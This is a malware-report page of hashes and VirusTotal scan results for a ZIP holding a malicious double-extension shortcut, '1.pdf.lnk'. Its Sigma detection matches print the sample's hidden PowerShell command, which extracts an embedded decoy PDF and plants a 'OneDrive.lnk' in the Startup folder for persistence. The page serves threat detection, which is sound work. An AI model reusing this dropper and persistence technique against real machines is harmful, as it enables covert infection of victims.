c499e415f7e07f513d8319013a8b2e86

Hash

  • MD5: c499e415f7e07f513d8319013a8b2e86
  • SHA1: 0f692113751a07b5f83f27fd53bc0c069c358f57
  • SHA256: e2caedcaabbcf467a714b62bf94ec70e4e4c7d74245f72bbcf20611cc91c825e
  • First Seen: 2026-05-15
  • Last Seen: 2026-05-15
Shortcuts: Hybrid Analysis MalwareBazaar Virustotal

Additional Information

VirusTotal
                {
    "data": {
        "id": "e2caedcaabbcf467a714b62bf94ec70e4e4c7d74245f72bbcf20611cc91c825e",
        "type": "file",
        "links": {
            "self": "https://www.virustotal.com/api/v3/files/e2caedcaabbcf467a714b62bf94ec70e4e4c7d74245f72bbcf20611cc91c825e"
        },
        "attributes": {
            "last_submission_date": 1773619821,
            "popular_threat_classification": {
                "popular_threat_name": [
                    {
                        "count": 2,
                        "value": "downlnk"
                    },
                    {
                        "count": 2,
                        "value": "lnkexec"
                    },
                    {
                        "count": 2,
                        "value": "runner"
                    }
                ],
                "suggested_threat_label": "trojan.downlnk/lnkexec",
                "popular_threat_category": [
                    {
                        "count": 24,
                        "value": "trojan"
                    },
                    {
                        "count": 10,
                        "value": "downloader"
                    },
                    {
                        "count": 1,
                        "value": "phishing"
                    }
                ]
            },
            "sigma_analysis_stats": {
                "critical": 0,
                "high": 1,
                "medium": 2,
                "low": 1
            },
            "type_tags": [
                "compressed",
                "zip"
            ],
            "type_tag": "zip",
            "md5": "c499e415f7e07f513d8319013a8b2e86",
            "last_analysis_stats": {
                "malicious": 35,
                "suspicious": 0,
                "undetected": 31,
                "harmless": 0,
                "timeout": 0,
                "confirmed-timeout": 0,
                "failure": 0,
                "type-unsupported": 9
            },
            "vhash": "d462640e7890aed31d4182a38b4ec966",
            "magic": "Zip archive data, at least v2.0 to extract, compression method=deflate",
            "size": 16865,
            "sigma_analysis_results": [
                {
                    "rule_level": "high",
                    "rule_id": "00b61d3ad8d5b276f712ce687ea306dc5b640516a51e65fd05ec277c5b979611",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Suspicious Parent Double Extension File Execution",
                    "rule_description": "Detect execution of suspicious double extension files in ParentCommandLine",
                    "rule_author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
                    "match_context": [
                        {
                            "values": {
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
                                "Description": "Windows PowerShell",
                                "EventID": "1",
                                "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c \"cd ^\"C:\\Users\\Bruno\\AppData\\Local\\Temp^\" && start /wait ^\"^\" ^\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\1.pdf.lnk^\"",
                                "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -WindowStyle Hidden -command $src='1.pdf.lnk'; $out=$env:TEMP + '\\1.pdf'; $fs=[IO.File]::OpenRead($src);$fs.Seek(20KB,'Begin')|Out-Null;$b=New-Object byte[] ($fs.Length - 20KB);$fs.Read($b,0,$b.Length)|Out-Null;$fs.Close();[IO.File]::WriteAllBytes($out,$b);start $out; $out=[Environment]::GetFolderPath('Startup') + '\\OneDrive.lnk'; $fs=[IO.File]::OpenRead($src);$fs.Seek(10KB,'Begin')|Out-Null;$b=New-Object byte[] (10KB);$fs.Read($b,0,$b [TRUNCATED]",
                                "FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
                                "ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "medium",
                    "rule_id": "56b8c79acb8e444c2b00be5c9d3cb8e33e863ccb3506d635f907a49cd053c84f",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Startup Folder File Write",
                    "rule_description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.",
                    "rule_author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
                    "match_context": [
                        {
                            "values": {
                                "TargetFilename": "C:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OneDrive.lnk"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "medium",
                    "rule_id": "a22ff20d7afa397abe4e6127e6da647b437781be86602fc20a88c1403f1200bc",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Suspicious LNK Double Extension File Created",
                    "rule_description": "Detects the creation of files with an \"LNK\" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the \"LNK\" extension by default.\n",
                    "rule_author": "Nasreddine Bencherchali (Nextron Systems), frack113",
                    "match_context": [
                        {
                            "values": {
                                "Image": "C:\\Windows\\SysWOW64\\7za.exe",
                                "EventID": "11",
                                "TargetFilename": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\5u32yahy.icv\\1.pdf.lnk"
                            }
                        },
                        {
                            "values": {
                                "TargetFilename": "<RunDir>\\1.pdf.lnk"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "low",
                    "rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Non Interactive PowerShell Process Spawned",
                    "rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
                    "rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
                    "match_context": [
                        {
                            "values": {
                                "Product": "Microsoft\\xae Windows\\xae Operating System",
                                "CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
                                "OriginalFileName": "PowerShell.EXE",
                                "Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
                                "Description": "Windows PowerShell",
                                "FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
                                "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c \"cd ^\"C:\\Users\\Bruno\\AppData\\Local\\Temp^\" && start /wait ^\"^\" ^\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\1.pdf.lnk^\"",
                                "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -WindowStyle Hidden -command $src='1.pdf.lnk'; $out=$env:TEMP + '\\1.pdf'; $fs=[IO.File]::OpenRead($src);$fs.Seek(20KB,'Begin')|Out-Null;$b=New-Object byte[] ($fs.Length - 20KB);$fs.Read($b,0,$b.Length)|Out-Null;$fs.Close();[IO.File]::WriteAllBytes($out,$b);start $out; $out=[Environment]::GetFolderPath('Startup') + '\\OneDrive.lnk'; $fs=[IO.File]::OpenRead($src);$fs.Seek(10KB,'Begin')|Out-Null;$b=New-Object byte[] (10KB);$fs.Read($b,0,$b [TRUNCATED]",
                                "EventID": "1",
                                "ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -WindowStyle Hidden -command $src='1.pdf.lnk'; $out=$env:TEMP + '\\1.pdf'; $fs=[IO.File]::OpenRead($src);$fs.Seek(20KB,'Begin')|Out-Null;$b=New-Object byte[] ($fs.Length - 20KB);$fs.Read($b,0,$b.Length)|Out-Null;$fs.Close();[IO.File]::WriteAllBytes($out,$b);start $out; $out=[Environment]::GetFolderPath('Startup') + '\\OneDrive.lnk'; $fs=[IO.File]::OpenRead($src);$fs.Seek(10KB,'Begin')|Out-Null;$b=New-Object byte[] (10KB);$fs.Read($b,0,$b [TRUNCATED]",
                                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "EventID": "1"
                            }
                        }
                    ]
                }
            ],
            "reputation": -1,
            "last_modification_date": 1779800022,
            "total_votes": {
                "harmless": 0,
                "malicious": 1
            },
            "names": [
                "d97f652a66d926dcf66b90cf3e2ad055834d99ea73ec8f16ad8403ae91e30471"
            ],
            "trid": [
                {
                    "file_type": "ZIP compressed archive",
                    "probability": 100.0
                }
            ],
            "type_description": "ZIP",
            "last_analysis_date": 1779792457,
            "sha256": "e2caedcaabbcf467a714b62bf94ec70e4e4c7d74245f72bbcf20611cc91c825e",
            "first_seen_itw_date": 1773657874,
            "sha1": "0f692113751a07b5f83f27fd53bc0c069c358f57",
            "ssdeep": "384:Rr9Y+GCqw3KDrKY4tvizlwSIa66KX4po7xwETStjRk/29+O6:Rdqw3wrKY4tviJwtjB4W7xwBjRk/IE",
            "tlsh": "T10D72D0ED4732C86BB2D256AE328F41149C4EBBBA6376BB3CFC8465114E26105C27D15E",
            "tags": [
                "long-sleeps",
                "zip",
                "detect-debug-environment"
            ],
            "type_extension": "zip",
            "filecondis": {
                "dhash": "181c181c1d180000",
                "raw_md5": "0299c65a660d64591a46a060c9fd8845"
            },
            "first_submission_date": 1773619821,
            "last_analysis_results": {
                "Bkav": {
                    "method": "blacklist",
                    "engine_name": "Bkav",
                    "engine_version": "8.2.40(8338)",
                    "engine_update": "20260525",
                    "category": "undetected",
                    "result": null
                },
                "Lionic": {
                    "method": "blacklist",
                    "engine_name": "Lionic",
                    "engine_version": "8.16",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Trojan.ZIP.Turla.4!c"
                },
                "MicroWorld-eScan": {
                    "method": "blacklist",
                    "engine_name": "MicroWorld-eScan",
                    "engine_version": "14.0.409.0",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "ClamAV": {
                    "method": "blacklist",
                    "engine_name": "ClamAV",
                    "engine_version": "1.5.2.0",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Win.Trojan.Suspect-34"
                },
                "CTX": {
                    "method": "blacklist",
                    "engine_name": "CTX",
                    "engine_version": "2024.8.29.1",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "zip.trojan.generic"
                },
                "CAT-QuickHeal": {
                    "method": "blacklist",
                    "engine_name": "CAT-QuickHeal",
                    "engine_version": "22.00",
                    "engine_update": "20260525",
                    "category": "undetected",
                    "result": null
                },
                "Skyhigh": {
                    "method": "blacklist",
                    "engine_name": "Skyhigh",
                    "engine_version": "v2021.2.0+4045",
                    "engine_update": "20260525",
                    "category": "malicious",
                    "result": "Artemis!Trojan"
                },
                "ALYac": {
                    "method": "blacklist",
                    "engine_name": "ALYac",
                    "engine_version": "2.0.0.10",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Trojan.Agent.LNK.Gen"
                },
                "Malwarebytes": {
                    "method": "blacklist",
                    "engine_name": "Malwarebytes",
                    "engine_version": "3.1.0.235",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "VIPRE": {
                    "method": "blacklist",
                    "engine_name": "VIPRE",
                    "engine_version": "6.0.0.35",
                    "engine_update": "20260525",
                    "category": "malicious",
                    "result": "Trojan.Downloader.335"
                },
                "Sangfor": {
                    "method": "blacklist",
                    "engine_name": "Sangfor",
                    "engine_version": "2.22.3.0",
                    "engine_update": "20260525",
                    "category": "undetected",
                    "result": null
                },
                "K7AntiVirus": {
                    "method": "blacklist",
                    "engine_name": "K7AntiVirus",
                    "engine_version": "14.54.59615",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "BitDefender": {
                    "method": "blacklist",
                    "engine_name": "BitDefender",
                    "engine_version": "7.2",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Trojan.Downloader.335"
                },
                "K7GW": {
                    "method": "blacklist",
                    "engine_name": "K7GW",
                    "engine_version": "14.54.59617",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Trustlook": {
                    "method": "blacklist",
                    "engine_name": "Trustlook",
                    "engine_version": "1.0",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "huorong": {
                    "method": "blacklist",
                    "engine_name": "huorong",
                    "engine_version": "b8a15cc:b8a15cc:e0fccfc:e0fccfc",
                    "engine_update": "20260525",
                    "category": "malicious",
                    "result": "Trojan/LNK.Runner.ac"
                },
                "VirIT": {
                    "method": "blacklist",
                    "engine_name": "VirIT",
                    "engine_version": "9.5.1214",
                    "engine_update": "20260525",
                    "category": "undetected",
                    "result": null
                },
                "Symantec": {
                    "method": "blacklist",
                    "engine_name": "Symantec",
                    "engine_version": "1.22.0.0",
                    "engine_update": "20260525",
                    "category": "malicious",
                    "result": "Trojan.Gen.NPE"
                },
                "ESET-NOD32": {
                    "method": "blacklist",
                    "engine_name": "ESET-NOD32",
                    "engine_version": "18.2.18.0",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "LNK/TrojanDownloader.Agent.CRN trojan"
                },
                "TrendMicro-HouseCall": {
                    "method": "blacklist",
                    "engine_name": "TrendMicro-HouseCall",
                    "engine_version": "24.550.0.1002",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "HEUR_LNKEXEC.A"
                },
                "Avast": {
                    "method": "blacklist",
                    "engine_name": "Avast",
                    "engine_version": "23.9.8494.0",
                    "engine_update": "20260515",
                    "category": "malicious",
                    "result": "Other:Malware-gen [Trj]"
                },
                "Cynet": {
                    "method": "blacklist",
                    "engine_name": "Cynet",
                    "engine_version": "4.0.3.4",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Malicious (score: 99)"
                },
                "Kaspersky": {
                    "method": "blacklist",
                    "engine_name": "Kaspersky",
                    "engine_version": "22.0.1.28",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "HEUR:Trojan.WinLNK.Turla.gen"
                },
                "Alibaba": {
                    "method": "blacklist",
                    "engine_name": "Alibaba",
                    "engine_version": "0.3.0.5",
                    "engine_update": "20190527",
                    "category": "malicious",
                    "result": "Trojan:Package/phishing.7"
                },
                "NANO-Antivirus": {
                    "method": "blacklist",
                    "engine_name": "NANO-Antivirus",
                    "engine_version": "1.0.170.26895",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "ViRobot": {
                    "method": "blacklist",
                    "engine_name": "ViRobot",
                    "engine_version": "2014.3.20.0",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Rising": {
                    "method": "blacklist",
                    "engine_name": "Rising",
                    "engine_version": "25.0.0.28",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Trojan.PSRunner/LNK!1.BADE (CLASSIC)"
                },
                "Sophos": {
                    "method": "blacklist",
                    "engine_name": "Sophos",
                    "engine_version": "3.5.1.0",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Troj/DownLnk-CM"
                },
                "F-Secure": {
                    "method": "blacklist",
                    "engine_name": "F-Secure",
                    "engine_version": "18.10.1547.307",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Trojan-Downloader:W32/LnkDropper.E"
                },
                "DrWeb": {
                    "method": "blacklist",
                    "engine_name": "DrWeb",
                    "engine_version": "7.0.75.2070",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Zillya": {
                    "method": "blacklist",
                    "engine_name": "Zillya",
                    "engine_version": "2.0.0.5608",
                    "engine_update": "20260525",
                    "category": "undetected",
                    "result": null
                },
                "TrendMicro": {
                    "method": "blacklist",
                    "engine_name": "TrendMicro",
                    "engine_version": "24.550.0.1002",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "HEUR_LNKEXEC.A"
                },
                "McAfeeD": {
                    "method": "blacklist",
                    "engine_name": "McAfeeD",
                    "engine_version": "1.2.0.14532",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "ti!E2CAEDCAABBC"
                },
                "CMC": {
                    "method": "blacklist",
                    "engine_name": "CMC",
                    "engine_version": "2.4.2022.1",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Emsisoft": {
                    "method": "blacklist",
                    "engine_name": "Emsisoft",
                    "engine_version": "2024.8.0.61147",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Trojan.Downloader.335 (B)"
                },
                "Ikarus": {
                    "method": "blacklist",
                    "engine_name": "Ikarus",
                    "engine_version": "6.4.16.0",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Trojan-Downloader.LNK.Agent"
                },
                "GData": {
                    "method": "blacklist",
                    "engine_name": "GData",
                    "engine_version": "GD:27.44681AVA:64.31308",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Trojan.Downloader.335"
                },
                "Jiangmin": {
                    "method": "blacklist",
                    "engine_name": "Jiangmin",
                    "engine_version": "16.0.100",
                    "engine_update": "20260525",
                    "category": "undetected",
                    "result": null
                },
                "Webroot": {
                    "method": "blacklist",
                    "engine_name": "Webroot",
                    "engine_version": "1.9.0.8",
                    "engine_update": "20250227",
                    "category": "undetected",
                    "result": null
                },
                "Google": {
                    "method": "blacklist",
                    "engine_name": "Google",
                    "engine_version": "1779789766",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Detected"
                },
                "Avira": {
                    "method": "blacklist",
                    "engine_name": "Avira",
                    "engine_version": "8.3.3.24",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "TR/Malware"
                },
                "Antiy-AVL": {
                    "method": "blacklist",
                    "engine_name": "Antiy-AVL",
                    "engine_version": "3.0",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Kingsoft": {
                    "method": "blacklist",
                    "engine_name": "Kingsoft",
                    "engine_version": "None",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Microsoft": {
                    "method": "blacklist",
                    "engine_name": "Microsoft",
                    "engine_version": "1.1.26040.8",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Trojan:Win32/Qwexlafiba!rfn"
                },
                "Gridinsoft": {
                    "method": "blacklist",
                    "engine_name": "Gridinsoft",
                    "engine_version": "1.0.246.174",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Xcitium": {
                    "method": "blacklist",
                    "engine_name": "Xcitium",
                    "engine_version": "38677",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Arcabit": {
                    "method": "blacklist",
                    "engine_name": "Arcabit",
                    "engine_version": "2025.0.0.23",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Trojan.Downloader.335"
                },
                "SUPERAntiSpyware": {
                    "method": "blacklist",
                    "engine_name": "SUPERAntiSpyware",
                    "engine_version": "5.6.0.1032",
                    "engine_update": "20260525",
                    "category": "undetected",
                    "result": null
                },
                "ZoneAlarm": {
                    "method": "blacklist",
                    "engine_name": "ZoneAlarm",
                    "engine_version": "6.25-116107039",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Troj/DownLnk-CM"
                },
                "Avast-Mobile": {
                    "method": "blacklist",
                    "engine_name": "Avast-Mobile",
                    "engine_version": "260526-00",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Varist": {
                    "method": "blacklist",
                    "engine_name": "Varist",
                    "engine_version": "6.6.1.3",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "LNK/ABTrojan.ZIOH-"
                },
                "AhnLab-V3": {
                    "method": "blacklist",
                    "engine_name": "AhnLab-V3",
                    "engine_version": "3.30.0.10666",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "LNK/Runner.S1"
                },
                "Acronis": {
                    "method": "blacklist",
                    "engine_name": "Acronis",
                    "engine_version": "1.2.0.121",
                    "engine_update": "20240328",
                    "category": "undetected",
                    "result": null
                },
                "VBA32": {
                    "method": "blacklist",
                    "engine_name": "VBA32",
                    "engine_version": "5.6.1",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "suspected of Trojan.Link.PsLauncher"
                },
                "TACHYON": {
                    "method": "blacklist",
                    "engine_name": "TACHYON",
                    "engine_version": "2026-05-26.02",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Zoner": {
                    "method": "blacklist",
                    "engine_name": "Zoner",
                    "engine_version": "2.2.2.0",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Probably Heur.LNKScript"
                },
                "Tencent": {
                    "method": "blacklist",
                    "engine_name": "Tencent",
                    "engine_version": "1.0.0.1",
                    "engine_update": "20260526",
                    "category": "malicious",
                    "result": "Win32.Trojan-Downloader.Der.Osmw"
                },
                "Yandex": {
                    "method": "blacklist",
                    "engine_name": "Yandex",
                    "engine_version": "5.5.2.24",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "TrellixENS": {
                    "method": "blacklist",
                    "engine_name": "TrellixENS",
                    "engine_version": "6.0.6.653",
                    "engine_update": "20260525",
                    "category": "undetected",
                    "result": null
                },
                "SentinelOne": {
                    "method": "blacklist",
                    "engine_name": "SentinelOne",
                    "engine_version": "7.6.2.19",
                    "engine_update": "20260324",
                    "category": "undetected",
                    "result": null
                },
                "MaxSecure": {
                    "method": "blacklist",
                    "engine_name": "MaxSecure",
                    "engine_version": "1.0.0.1",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "Fortinet": {
                    "method": "blacklist",
                    "engine_name": "Fortinet",
                    "engine_version": "7.0.48.0",
                    "engine_update": "20260526",
                    "category": "undetected",
                    "result": null
                },
                "AVG": {
                    "method": "blacklist",
                    "engine_name": "AVG",
                    "engine_version": "23.9.8494.0",
                    "engine_update": "20260515",
                    "category": "malicious",
                    "result": "Other:Malware-gen [Trj]"
                },
                "Panda": {
                    "method": "blacklist",
                    "engine_name": "Panda",
                    "engine_version": "4.6.4.2",
                    "engine_update": "20260525",
                    "category": "undetected",
                    "result": null
                },
                "CrowdStrike": {
                    "method": "blacklist",
                    "engine_name": "CrowdStrike",
                    "engine_version": "1.0",
                    "engine_update": "20251219",
                    "category": "undetected",
                    "result": null
                },
                "alibabacloud": {
                    "method": "blacklist",
                    "engine_name": "alibabacloud",
                    "engine_version": "2.2.0",
                    "engine_update": "20250321",
                    "category": "malicious",
                    "result": "Trojan[downloader]:Win/Wacatac.B9nj"
                },
                "SymantecMobileInsight": {
                    "method": "blacklist",
                    "engine_name": "SymantecMobileInsight",
                    "engine_version": "2.0",
                    "engine_update": "20260123",
                    "category": "type-unsupported",
                    "result": null
                },
                "BitDefenderFalx": {
                    "method": "blacklist",
                    "engine_name": "BitDefenderFalx",
                    "engine_version": "2.0.936",
                    "engine_update": "20260525",
                    "category": "type-unsupported",
                    "result": null
                },
                "Elastic": {
                    "method": "blacklist",
                    "engine_name": "Elastic",
                    "engine_version": "4.0.261",
                    "engine_update": "20260525",
                    "category": "type-unsupported",
                    "result": null
                },
                "DeepInstinct": {
                    "method": "blacklist",
                    "engine_name": "DeepInstinct",
                    "engine_version": "5.0.0.8",
                    "engine_update": "20260526",
                    "category": "type-unsupported",
                    "result": null
                },
                "APEX": {
                    "method": "blacklist",
                    "engine_name": "APEX",
                    "engine_version": "6.782",
                    "engine_update": "20260525",
                    "category": "type-unsupported",
                    "result": null
                },
                "Paloalto": {
                    "method": "blacklist",
                    "engine_name": "Paloalto",
                    "engine_version": "0.9.0.1003",
                    "engine_update": "20260526",
                    "category": "type-unsupported",
                    "result": null
                },
                "Trapmine": {
                    "method": "blacklist",
                    "engine_name": "Trapmine",
                    "engine_version": "4.0.12.0",
                    "engine_update": "20260504",
                    "category": "type-unsupported",
                    "result": null
                },
                "Cylance": {
                    "method": "blacklist",
                    "engine_name": "Cylance",
                    "engine_version": "3.0.0.0",
                    "engine_update": "20260521",
                    "category": "type-unsupported",
                    "result": null
                },
                "tehtris": {
                    "method": "blacklist",
                    "engine_name": "tehtris",
                    "engine_version": "v0.1.4",
                    "engine_update": "20260526",
                    "category": "type-unsupported",
                    "result": null
                }
            },
            "sigma_analysis_summary": {
                "Sigma Integrated Rule Set (GitHub)": {
                    "critical": 0,
                    "high": 1,
                    "medium": 2,
                    "low": 1
                }
            },
            "bundle_info": {
                "highest_datetime": "2026-03-12 05:40:12",
                "lowest_datetime": "2026-03-12 05:40:12",
                "num_children": 1,
                "extensions": {
                    "lnk": 1
                },
                "file_types": {
                    "unknown": 1
                },
                "type": "ZIP",
                "uncompressed_size": 22008
            },
            "magika": "ZIP",
            "times_submitted": 1,
            "unique_sources": 1
        }
    }
}
            

Related Reports

« Back
⚠ These IoCs were automatically extracted using regular expressions or an LLM and may include non-malicious data.